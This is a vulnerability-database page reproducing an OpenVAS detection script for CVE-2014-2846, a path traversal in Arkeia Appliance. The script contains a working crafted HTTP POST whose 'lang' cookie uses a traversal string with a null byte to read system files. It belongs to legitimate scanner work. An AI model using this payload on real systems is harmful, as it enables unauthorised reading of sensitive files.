Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310105011
HistoryApr 23, 2014 - 12:00 a.m.

Arkeia Appliance Path Traversal Vulnerability

2014-04-2300:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
13

6.4 Medium

AI Score

Confidence

Low

0.106 Low

EPSS

Percentile

95.0%

JSON

Arkeia Appliance is affected by a path traversal vulnerability.

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:knox_software:arkeia_appliance";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105011");
  script_version("2023-07-26T05:05:09+0000");
  script_cve_id("CVE-2014-2846");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
  script_tag(name:"creation_date", value:"2014-04-23 13:16:06 +0200 (Wed, 23 Apr 2014)");
  script_name("Arkeia Appliance Path Traversal Vulnerability");

  script_tag(name:"summary", value:"Arkeia Appliance is affected by a path traversal vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted HTTP POST request and check is it possible to read
  a system file.");

  script_tag(name:"solution", value:"Updates are available. Please see the references for more information.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"insight", value:"Path traversal enables attackers access to files and directories outside the
  web root through relative file paths in the user input.");

  script_tag(name:"affected", value:"Arkeia Appliance Version 10.2.7 and prior.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to perform directory
  traversal attacks and read arbitrary files on the affected application.");

  script_xref(name:"URL", value:"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140423-0_WD_Arkeia_Path_Traversal_v10.txt");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/67039");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_arkeia_virtual_appliance_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("ArkeiaAppliance/installed");
  script_require_keys("Host/runs_unixoide");
  script_require_ports("Services/www", 80);
  script_xref(name:"URL", value:"http://www.arkeia.com/");
  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");

if( ! port = get_app_port( cpe:CPE, service:"www") )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

files = traversal_files( "linux" );
vtstrings = get_vt_strings();
vtstring_lower = vtstrings["lowercase"];

host = http_host_name(port:port);

foreach pattern( keys( files ) ) {

  file = files[pattern];

  req = 'POST /login/doLogin HTTP/1.0\r\n' +
        'Host: ' + host + '\r\n' +
        'Cookie: lang=aaa..././..././..././..././..././..././' + file + '%00\r\n' +
        'Content-Length: 33\r\n' +
        'Content-Type: application/x-www-form-urlencoded\r\n' +
        '\r\n' +
        'password=' + vtstring_lower + '&username=' + vtstring_lower;
  res = http_send_recv( port:port, data:req, bodyonly:FALSE );

  if( res && egrep( string:res, pattern:pattern ) ) {
    security_message( port:port );
    exit( 0 );
  }
}

exit( 99 );

Related

checkpoint_advisories 1
prion 1
securityvulns 2
cve 1
seebug 1
nessus 2
zdt 1
cvelist 1
packetstorm 1
exploitpack 1
exploitdb 1
checkpoint_advisories
checkpoint_advisories
Western Digital Arkeia Remote Code Execution (CVE-2014-2846)
2014-07-28 00:00:00
prion
prion
Directory traversal
2014-04-28 14:09:00
securityvulns
securityvulns
WD Arkeia Network Backup security vulnerabilities
2014-05-04 00:00:00
SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances
2014-05-04 00:00:00
cve
cve
CVE-2014-2846
2014-04-28 14:09:00
seebug
seebug
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion
2014-07-01 00:00:00
nessus
nessus
Western Digital Arkeia lang Cookie Crafted Local File Inclusion
2014-05-28 00:00:00
Western Digital Arkeia 10.1.x < 10.1.19 / 10.2.x < 10.2.9 Multiple Vulnerabilities (Heartbleed)
2014-06-02 00:00:00
zdt
zdt
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion Vulnerability
2014-04-24 00:00:00
cvelist
cvelist
CVE-2014-2846
2014-04-28 14:00:00
packetstorm
packetstorm
WD Arkeia Virtual Appliance Directory Traversal / Command Execution
2014-04-23 00:00:00
exploitpack
exploitpack
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion
2014-04-24 00:00:00
exploitdb
exploitdb
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion
2014-04-24 00:00:00

6.4 Medium

AI Score

Confidence

Low

0.106 Low

EPSS

Percentile

95.0%

JSON
Related for OPENVAS:1361412562310105011
checkpoint_advisories1prion1securityvulns2cve1seebug1nessus2zdt1cvelist1packetstorm1exploitpack1exploitdb1